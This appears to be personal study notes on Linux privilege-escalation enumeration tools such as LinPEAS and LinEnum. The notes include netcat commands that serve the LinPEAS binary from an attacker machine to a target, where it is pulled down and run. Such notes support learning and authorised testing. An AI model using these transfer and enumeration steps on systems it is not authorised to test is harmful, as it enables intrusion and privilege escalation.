# enumerateLinuxTools ###### tags: `enumerate` `linux` `tools` # Save time LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS LinEnum: https://github.com/rebootuser/LinEnum LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration Linux Priv Checker: https://github.com/linted/linuxprivchecker # Linpeas (Linux Privilege Escalation awesome script) ## Search for - Linux - Unix* - MacOS ## Explained: https://book.hacktricks.xyz/linux-hardening/privilege-escalation ## Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist ## latest versions of all the scripts https://github.com/carlospolop/PEASS-ng/releases/tag/20230108 ## Start We have to attempt to run the script on the target machine. Could Use - curl - netcat - wget (Our machine) ``` wget https://github.com/carlospolop/PEASS-ng/releases/download/20230108/linpeas_linux_amd64 netcat -lvnp 443 < linpeas_linux_amd64 ``` sh: run the script "/bin/sh" (Target Machine) ``` cd /etc/tmp (permission) nc (ourIP) (port) #Output to file ./linpeas_linux_amd64 -a > pppe.txt (possible prvilige escalation) ```  ## Basic information  ## System Information ### OS info  ### Sudo info  ### PATH  ### Environment  ### Executing Linux Exploit Suggester  ### Executing Linux Exploit Suggester 2  ### Protections  ## Container  ## Cloud  ## Processes, Crons, Timers, Services and Sockets ## Network Information ## Users Information ### Login now ### last logons ## Software Information ## Interesting Files ## API Keys Regex